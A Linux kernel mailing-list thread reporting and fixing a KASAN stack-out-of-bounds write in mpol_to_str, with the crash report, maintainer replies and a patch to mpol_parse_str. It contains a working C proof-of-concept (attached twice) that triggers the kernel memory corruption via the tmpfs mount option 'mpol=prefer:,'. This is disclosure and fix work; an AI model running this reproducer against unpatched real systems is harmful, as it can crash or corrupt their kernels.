* KASAN: stack-out-of-bounds Write in mpol_to_str
@ 2020-03-15 19:57 Entropy Moe
2020-03-16 18:46 ` Randy Dunlap
2020-03-26 0:45 ` [PATCH] mm: mempolicy: require at least one nodeid for MPOL_PREFERRED Randy Dunlap
0 siblings, 2 replies; 6+ messages in thread
From: Entropy Moe @ 2020-03-15 19:57 UTC (permalink / raw)
To: linux-kernel, linux-mm, akpm
[-- Attachment #1.1: Type: text/plain, Size: 237 bytes --]
Hello team,
how are you ?
I wanted to report a bug on mempolicy.c. I found the bug on the latest
version of the kernel.
which is stack out of bound vulnerability.
I am attaching report.
If you need the POC crash code, I can provide.
[-- Attachment #1.2: Type: text/html, Size: 390 bytes --]
[-- Attachment #2: mpol_to_str.txt --]
[-- Type: text/plain, Size: 3127 bytes --]
==================================================================
BUG: KASAN: stack-out-of-bounds in set_bit include/asm-generic/bitops/instrumented-atomic.h:28 [inline]
BUG: KASAN: stack-out-of-bounds in __node_set include/linux/nodemask.h:130 [inline]
BUG: KASAN: stack-out-of-bounds in mpol_to_str+0x2b9/0x380 mm/mempolicy.c:2962
Write of size 8 at addr ffff88806715fb58 by task systemd/1
CPU: 1 PID: 1 Comm: systemd Not tainted 5.6.0-rc3 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
Call Trace:
__dump_stack lib/dump_stack.c:77 [inline]
dump_stack+0xc6/0x11e lib/dump_stack.c:118
print_address_description.constprop.5+0x16/0x310 mm/kasan/report.c:374
__kasan_report+0x158/0x1c0 mm/kasan/report.c:506
kasan_report+0xe/0x20 mm/kasan/common.c:641
check_memory_region_inline mm/kasan/generic.c:185 [inline]
check_memory_region+0x15d/0x1b0 mm/kasan/generic.c:192
set_bit include/asm-generic/bitops/instrumented-atomic.h:28 [inline]
__node_set include/linux/nodemask.h:130 [inline]
mpol_to_str+0x2b9/0x380 mm/mempolicy.c:2962
shmem_show_mpol mm/shmem.c:1406 [inline]
shmem_show_options+0x37c/0x540 mm/shmem.c:3611
show_mountinfo+0x5b4/0x870 fs/proc_namespace.c:187
seq_read+0x9fb/0x1030 fs/seq_file.c:268
__vfs_read+0x7a/0x100 fs/read_write.c:425
vfs_read+0x15e/0x370 fs/read_write.c:461
ksys_read+0x17b/0x210 fs/read_write.c:587
do_syscall_64+0x9b/0x520 arch/x86/entry/common.c:294
entry_SYSCALL_64_after_hwframe+0x49/0xbe
RIP: 0033:0x7f67a589a910
Code: b6 fe ff ff 48 8d 3d 0f be 08 00 48 83 ec 08 e8 06 db 01 00 66 0f 1f 44 00 00 83 3d f9 2d 2c 00 00 75 10 b8 00 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 de 9b 01 00 48 89 04 24
RSP: 002b:00007ffefbf89888 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
RAX: ffffffffffffffda RBX: 000055b4a3ba9c00 RCX: 00007f67a589a910
RDX: 0000000000000400 RSI: 000055b4a3bba200 RDI: 0000000000000013
RBP: 0000000000000d68 R08: 00007f67a72cf500 R09: 00000000000000e0
R10: 000055b4a3bba5e3 R11: 0000000000000246 R12: 00007f67a5b55440
R13: 00007f67a5b54900 R14: 000000000000001d R15: 0000000000000000
The buggy address belongs to the page:
page:ffffea00019c57c0 refcount:0 mapcount:0 mapping:0000000000000000 index:0x0
flags: 0x100000000000000()
raw: 0100000000000000 ffffea00019c57c8 ffffea00019c57c8 0000000000000000
raw: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000
page dumped because: kasan: bad access detected
addr ffff88806715fb58 is located in stack of task systemd/1 at offset 40 in frame:
mpol_to_str+0x0/0x380 mm/mempolicy.c:2926
this frame has 1 object:
[32, 40) 'nodes'
Memory state around the buggy address:
ffff88806715fa00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
ffff88806715fa80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>ffff88806715fb00: 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2 00 00
^
ffff88806715fb80: 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00
ffff88806715fc00: 00 00 00 00 00 f3 f3 f3 f3 00 00 00 00 00 00 00
==================================================================
^ permalink raw reply [flat|nested] 6+ messages in thread
* Re: KASAN: stack-out-of-bounds Write in mpol_to_str
2020-03-15 19:57 KASAN: stack-out-of-bounds Write in mpol_to_str Entropy Moe
@ 2020-03-16 18:46 ` Randy Dunlap
2020-03-20 8:36 ` Entropy Moe
2020-03-26 0:45 ` [PATCH] mm: mempolicy: require at least one nodeid for MPOL_PREFERRED Randy Dunlap
1 sibling, 1 reply; 6+ messages in thread
From: Randy Dunlap @ 2020-03-16 18:46 UTC (permalink / raw)
To: Entropy Moe, linux-kernel, linux-mm, akpm
On 3/15/20 12:57 PM, Entropy Moe wrote:
> Hello team,
> how are you ?
> I wanted to report a bug on mempolicy.c. I found the bug on the latest version of the kernel.
>
> which is stack out of bound vulnerability.
>
> I am attaching report.
>
> If you need the POC crash code, I can provide.
Hi Moe,
Please post the POC code and your kernel .config file.
thanks.
--
~Randy
^ permalink raw reply [flat|nested] 6+ messages in thread
* Re: KASAN: stack-out-of-bounds Write in mpol_to_str
2020-03-16 18:46 ` Randy Dunlap
@ 2020-03-20 8:36 ` Entropy Moe
2020-03-21 6:45 ` Andrew Morton
2020-03-26 0:54 ` Randy Dunlap
0 siblings, 2 replies; 6+ messages in thread
From: Entropy Moe @ 2020-03-20 8:36 UTC (permalink / raw)
To: Randy Dunlap; +Cc: linux-kernel, linux-mm, akpm
[-- Attachment #1.1: Type: text/plain, Size: 555 bytes --]
Hello Randy,
please see attached POC for the vulnerability.
On Mon, Mar 16, 2020 at 10:46 PM Randy Dunlap <rdunlap@infradead.org> wrote:
> On 3/15/20 12:57 PM, Entropy Moe wrote:
> > Hello team,
> > how are you ?
> > I wanted to report a bug on mempolicy.c. I found the bug on the latest
> version of the kernel.
> >
> > which is stack out of bound vulnerability.
> >
> > I am attaching report.
> >
> > If you need the POC crash code, I can provide.
>
> Hi Moe,
>
> Please post the POC code and your kernel .config file.
>
> thanks.
> --
> ~Randy
>
>
[-- Attachment #1.2: Type: text/html, Size: 972 bytes --]
[-- Attachment #2: mpol_to_string_poc.c --]
[-- Type: text/x-csrc, Size: 3515 bytes --]
#define _GNU_SOURCE
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#include <linux/loop.h>
static unsigned long long procid;
struct fs_image_segment {
void* data;
uintptr_t size;
uintptr_t offset;
};
#define IMAGE_MAX_SEGMENTS 4096
#define IMAGE_MAX_SIZE (129 << 20)
#define sys_memfd_create 319
static unsigned long fs_image_segment_check(unsigned long size, unsigned long nsegs, long segments)
{
unsigned long i;
struct fs_image_segment* segs = (struct fs_image_segment*)segments;
if (nsegs > IMAGE_MAX_SEGMENTS)
nsegs = IMAGE_MAX_SEGMENTS;
for (i = 0; i < nsegs; i++) {
if (segs[i].size > IMAGE_MAX_SIZE)
segs[i].size = IMAGE_MAX_SIZE;
segs[i].offset %= IMAGE_MAX_SIZE;
if (segs[i].offset > IMAGE_MAX_SIZE - segs[i].size)
segs[i].offset = IMAGE_MAX_SIZE - segs[i].size;
if (size < segs[i].offset + segs[i].offset)
size = segs[i].offset + segs[i].offset;
}
if (size > IMAGE_MAX_SIZE)
size = IMAGE_MAX_SIZE;
return size;
}
static long syz_mount_image(volatile long fsarg, volatile long dir, volatile unsigned long size, volatile unsigned long nsegs, volatile long segments, volatile long flags, volatile long optsarg)
{
char loopname[64], fs[32], opts[256];
int loopfd, err = 0, res = -1;
unsigned long i;
size = fs_image_segment_check(size, nsegs, segments);
int memfd = syscall(sys_memfd_create, "syz_mount_image", 0);
if (memfd == -1) {
err = errno;
goto error;
}
if (ftruncate(memfd, size)) {
err = errno;
goto error_close_memfd;
}
for (i = 0; i < nsegs; i++) {
struct fs_image_segment* segs = (struct fs_image_segment*)segments;
int res1 = 0;
res1 = pwrite(memfd, segs[i].data, segs[i].size, segs[i].offset);
if (res1 < 0) {
}
}
snprintf(loopname, sizeof(loopname), "/dev/loop%llu", procid);
loopfd = open(loopname, O_RDWR);
if (loopfd == -1) {
err = errno;
goto error_close_memfd;
}
if (ioctl(loopfd, LOOP_SET_FD, memfd)) {
if (errno != EBUSY) {
err = errno;
goto error_close_loop;
}
ioctl(loopfd, LOOP_CLR_FD, 0);
usleep(1000);
if (ioctl(loopfd, LOOP_SET_FD, memfd)) {
err = errno;
goto error_close_loop;
}
}
mkdir((char*)dir, 0777);
memset(fs, 0, sizeof(fs));
strncpy(fs, (char*)fsarg, sizeof(fs) - 1);
memset(opts, 0, sizeof(opts));
strncpy(opts, (char*)optsarg, sizeof(opts) - 32);
if (strcmp(fs, "iso9660") == 0) {
flags |= MS_RDONLY;
} else if (strncmp(fs, "ext", 3) == 0) {
if (strstr(opts, "errors=panic") || strstr(opts, "errors=remount-ro") == 0)
strcat(opts, ",errors=continue");
} else if (strcmp(fs, "xfs") == 0) {
strcat(opts, ",nouuid");
}
if (mount(loopname, (char*)dir, fs, flags, opts)) {
err = errno;
goto error_clear_loop;
}
res = 0;
error_clear_loop:
ioctl(loopfd, LOOP_CLR_FD, 0);
error_close_loop:
close(loopfd);
error_close_memfd:
close(memfd);
error:
errno = err;
return res;
}
int main(void)
{
syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 3ul, 0x32ul, -1, 0);
memcpy((void*)0x20000000, "tmpfs\000", 6);
memcpy((void*)0x20000100, "./file0\000", 8);
memcpy((void*)0x20000340, "mpol", 4);
*(uint8_t*)0x20000344 = 0x3d;
memcpy((void*)0x20000345, "prefer", 6);
*(uint8_t*)0x2000034b = 0x3a;
*(uint8_t*)0x2000034c = 0x2c;
*(uint8_t*)0x2000034d = 0;
syz_mount_image(0x20000000, 0x20000100, 0, 0, 0, 0, 0x20000340);
return 0;
}
[-- Attachment #3: mpol_to_string_poc.c --]
[-- Type: text/x-csrc, Size: 3515 bytes --]
#define _GNU_SOURCE
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#include <linux/loop.h>
static unsigned long long procid;
struct fs_image_segment {
void* data;
uintptr_t size;
uintptr_t offset;
};
#define IMAGE_MAX_SEGMENTS 4096
#define IMAGE_MAX_SIZE (129 << 20)
#define sys_memfd_create 319
static unsigned long fs_image_segment_check(unsigned long size, unsigned long nsegs, long segments)
{
unsigned long i;
struct fs_image_segment* segs = (struct fs_image_segment*)segments;
if (nsegs > IMAGE_MAX_SEGMENTS)
nsegs = IMAGE_MAX_SEGMENTS;
for (i = 0; i < nsegs; i++) {
if (segs[i].size > IMAGE_MAX_SIZE)
segs[i].size = IMAGE_MAX_SIZE;
segs[i].offset %= IMAGE_MAX_SIZE;
if (segs[i].offset > IMAGE_MAX_SIZE - segs[i].size)
segs[i].offset = IMAGE_MAX_SIZE - segs[i].size;
if (size < segs[i].offset + segs[i].offset)
size = segs[i].offset + segs[i].offset;
}
if (size > IMAGE_MAX_SIZE)
size = IMAGE_MAX_SIZE;
return size;
}
static long syz_mount_image(volatile long fsarg, volatile long dir, volatile unsigned long size, volatile unsigned long nsegs, volatile long segments, volatile long flags, volatile long optsarg)
{
char loopname[64], fs[32], opts[256];
int loopfd, err = 0, res = -1;
unsigned long i;
size = fs_image_segment_check(size, nsegs, segments);
int memfd = syscall(sys_memfd_create, "syz_mount_image", 0);
if (memfd == -1) {
err = errno;
goto error;
}
if (ftruncate(memfd, size)) {
err = errno;
goto error_close_memfd;
}
for (i = 0; i < nsegs; i++) {
struct fs_image_segment* segs = (struct fs_image_segment*)segments;
int res1 = 0;
res1 = pwrite(memfd, segs[i].data, segs[i].size, segs[i].offset);
if (res1 < 0) {
}
}
snprintf(loopname, sizeof(loopname), "/dev/loop%llu", procid);
loopfd = open(loopname, O_RDWR);
if (loopfd == -1) {
err = errno;
goto error_close_memfd;
}
if (ioctl(loopfd, LOOP_SET_FD, memfd)) {
if (errno != EBUSY) {
err = errno;
goto error_close_loop;
}
ioctl(loopfd, LOOP_CLR_FD, 0);
usleep(1000);
if (ioctl(loopfd, LOOP_SET_FD, memfd)) {
err = errno;
goto error_close_loop;
}
}
mkdir((char*)dir, 0777);
memset(fs, 0, sizeof(fs));
strncpy(fs, (char*)fsarg, sizeof(fs) - 1);
memset(opts, 0, sizeof(opts));
strncpy(opts, (char*)optsarg, sizeof(opts) - 32);
if (strcmp(fs, "iso9660") == 0) {
flags |= MS_RDONLY;
} else if (strncmp(fs, "ext", 3) == 0) {
if (strstr(opts, "errors=panic") || strstr(opts, "errors=remount-ro") == 0)
strcat(opts, ",errors=continue");
} else if (strcmp(fs, "xfs") == 0) {
strcat(opts, ",nouuid");
}
if (mount(loopname, (char*)dir, fs, flags, opts)) {
err = errno;
goto error_clear_loop;
}
res = 0;
error_clear_loop:
ioctl(loopfd, LOOP_CLR_FD, 0);
error_close_loop:
close(loopfd);
error_close_memfd:
close(memfd);
error:
errno = err;
return res;
}
int main(void)
{
syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 3ul, 0x32ul, -1, 0);
memcpy((void*)0x20000000, "tmpfs\000", 6);
memcpy((void*)0x20000100, "./file0\000", 8);
memcpy((void*)0x20000340, "mpol", 4);
*(uint8_t*)0x20000344 = 0x3d;
memcpy((void*)0x20000345, "prefer", 6);
*(uint8_t*)0x2000034b = 0x3a;
*(uint8_t*)0x2000034c = 0x2c;
*(uint8_t*)0x2000034d = 0;
syz_mount_image(0x20000000, 0x20000100, 0, 0, 0, 0, 0x20000340);
return 0;
}
^ permalink raw reply [flat|nested] 6+ messages in thread
* Re: KASAN: stack-out-of-bounds Write in mpol_to_str
2020-03-20 8:36 ` Entropy Moe
@ 2020-03-21 6:45 ` Andrew Morton
2020-03-26 0:54 ` Randy Dunlap
1 sibling, 0 replies; 6+ messages in thread
From: Andrew Morton @ 2020-03-21 6:45 UTC (permalink / raw)
To: Entropy Moe; +Cc: Randy Dunlap, linux-kernel, linux-mm
On Fri, 20 Mar 2020 12:36:38 +0400 Entropy Moe <3ntr0py1337@gmail.com> wrote:
> Hello Randy,
> please see attached POC for the vulnerability.
>
Thanks. Ouch. afaict shmem's S_IFREG inode's mpol's preferred_node is
messed up.
I don't think anyone has worked on this code in a decade or more. Is
someone up to taking a look please?
> On Mon, Mar 16, 2020 at 10:46 PM Randy Dunlap <rdunlap@infradead.org> wrote:
>
> > On 3/15/20 12:57 PM, Entropy Moe wrote:
> > > Hello team,
> > > how are you ?
> > > I wanted to report a bug on mempolicy.c. I found the bug on the latest
> > version of the kernel.
> > >
> > > which is stack out of bound vulnerability.
> > >
> > > I am attaching report.
> > >
> > > If you need the POC crash code, I can provide.
> >
> > Hi Moe,
> >
> > Please post the POC code and your kernel .config file.
> >
> > thanks.
> > --
> > ~Randy
> >
> >
^ permalink raw reply [flat|nested] 6+ messages in thread
* [PATCH] mm: mempolicy: require at least one nodeid for MPOL_PREFERRED
2020-03-15 19:57 KASAN: stack-out-of-bounds Write in mpol_to_str Entropy Moe
2020-03-16 18:46 ` Randy Dunlap
@ 2020-03-26 0:45 ` Randy Dunlap
1 sibling, 0 replies; 6+ messages in thread
From: Randy Dunlap @ 2020-03-26 0:45 UTC (permalink / raw)
To: Entropy Moe, linux-kernel, linux-mm, akpm
From: Randy Dunlap <rdunlap@infradead.org>
Using an empty (malformed) nodelist that is not caught during
mount option parsing leads to a stack-out-of-bounds access.
The option string that was used was: "mpol=prefer:,".
However, MPOL_PREFERRED requires a single node number,
which is not being provided here.
Add a check that 'nodes' is not empty after parsing for
MPOL_PREFERRED's nodeid.
Fixes: 095f1fc4ebf3 ("mempolicy: rework shmem mpol parsing and display")
Reported-by: Entropy Moe <3ntr0py1337@gmail.com>
Signed-off-by: Randy Dunlap <rdunlap@infradead.org>
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: linux-mm@kvack.org
Cc: Lee Schermerhorn <lee.schermerhorn@hp.com>
---
mm/mempolicy.c | 6 +++++-
1 file changed, 5 insertions(+), 1 deletion(-)
--- lnx-56-rc6.orig/mm/mempolicy.c
+++ lnx-56-rc6/mm/mempolicy.c
@@ -2841,7 +2841,9 @@ int mpol_parse_str(char *str, struct mem
switch (mode) {
case MPOL_PREFERRED:
/*
- * Insist on a nodelist of one node only
+ * Insist on a nodelist of one node only, although later
+ * we use first_node(nodes) to grab a single node, so here
+ * nodelist (or nodes) cannot be empty.
*/
if (nodelist) {
char *rest = nodelist;
@@ -2849,6 +2851,8 @@ int mpol_parse_str(char *str, struct mem
rest++;
if (*rest)
goto out;
+ if (nodes_empty(nodes))
+ goto out;
}
break;
case MPOL_INTERLEAVE:
^ permalink raw reply [flat|nested] 6+ messages in thread
* Re: KASAN: stack-out-of-bounds Write in mpol_to_str
2020-03-20 8:36 ` Entropy Moe
2020-03-21 6:45 ` Andrew Morton
@ 2020-03-26 0:54 ` Randy Dunlap
1 sibling, 0 replies; 6+ messages in thread
From: Randy Dunlap @ 2020-03-26 0:54 UTC (permalink / raw)
To: Entropy Moe; +Cc: linux-kernel, linux-mm, akpm, Dmitry Vyukov
On 3/20/20 1:36 AM, Entropy Moe wrote:
> Hello Randy,
> please see attached POC for the vulnerability.
>
Hi Moe,
Do you have anything to do with the syzkaller source code generation? (POC; reproducers)
I don't expect it to be beautiful, but it could be a lot easier to read in a few places.
E.g., the POC that you provided sets a tmpfs mount option string to
"mpol=prefer:,", which is probably purposely malformed (OK), but it does
so in an unreadable manner: (I added the // comments.)
memcpy((void*)0x20000340, "mpol", 4);
*(uint8_t*)0x20000344 = 0x3d; // =
memcpy((void*)0x20000345, "prefer", 6);
*(uint8_t*)0x2000034b = 0x3a; // :
*(uint8_t*)0x2000034c = 0x2c; // ,
*(uint8_t*)0x2000034d = 0;
That kind of obfuscation just helps slow down debugging. :(
--
~Randy
^ permalink raw reply [flat|nested] 6+ messages in thread
end of thread, other threads:[~2020-03-26 0:54 UTC | newest]
Thread overview: 6+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2020-03-15 19:57 KASAN: stack-out-of-bounds Write in mpol_to_str Entropy Moe
2020-03-16 18:46 ` Randy Dunlap
2020-03-20 8:36 ` Entropy Moe
2020-03-21 6:45 ` Andrew Morton
2020-03-26 0:54 ` Randy Dunlap
2020-03-26 0:45 ` [PATCH] mm: mempolicy: require at least one nodeid for MPOL_PREFERRED Randy Dunlap
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).